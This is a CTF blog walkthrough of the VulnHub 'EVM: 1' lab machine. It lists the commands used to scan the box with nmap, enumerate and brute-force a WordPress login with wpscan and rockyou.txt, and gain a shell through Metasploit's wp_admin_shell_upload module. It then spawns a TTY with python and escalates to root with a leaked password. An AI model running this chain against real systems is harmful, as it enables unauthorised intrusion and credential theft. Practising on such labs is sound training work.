EVM: 1 walkthrough vulnhub ctf

ctf | ctf

Today we are solving vulnhub another CTF EVM: 1 is created by Ic0de this VM is beginner user you can download here

Description EVM: 1

This is a super friendly box intended for Beginner’s

Network Scanning

First, we scanning our network and finding our target IP address


in my case, my target IP is

our next step is scanning all ports and services with Nmap basic service version scan

nmap -sV
 EVM: 1 walkthrough vulnhub ctf


we see the target machine many port open but I generally concentrate on port 80 I open the target Ip our browser and we see the default apache2 ubuntu default page
 EVM: 1 walkthrough vulnhub ctf

I looking the apache default page then I found a hint You can find me at /WordPress without wasting our time I move on wpscan WordPress scanner and -e u Parameter use all user enumerate

wpscan --url -e u
 EVM: 1 walkthrough vulnhub ctf

and we found a user c0rrupt3d_brain next step is brute force password attack I used big wordlist file rockyou.txt and -t parameter to upgrade threads

wpscan --url -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt -t 100
 EVM: 1 writeup vulnhub


Finally, 10-15 later we found a valid password I search exploit-db and I found an exploit WordPress file upload I fill all information which is required this exploit

use exploit/unix/webapp/wp_admin_shell_upload
set rhost 192.1681.1.5

set targeturi /wordpress
set username c0rrupt3d_brain

set password 24992499

Our Metasploit attack is successful and meterpreter session is open now I ran the shell command and we see blank shell


bypassing the shell using python3 spawn shell importing

python3 -c 'import pty;pty.spawn("/bin/bash")'
cd ~

cd root3r

ls -lsa

After enumeration the system directory and file, I found a hidden file root_password_ssh.txt I open the file cat command and we see root user password

cat .root_password_ssh.txt

Privilege Escalation

We already found root account password I run the su ( switch user ) root command and paste the password willy26 and I got root shell I move on the root user home directory and I found a file proof.txt

su root
cd /root


Reading our root proof.txt cat command

cat proof.txt
 EVM: 1 walkthrough vulnhub ctf
bossplayersCTF: 1 link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

Leave a Reply

Your email address will not be published. Required fields are marked *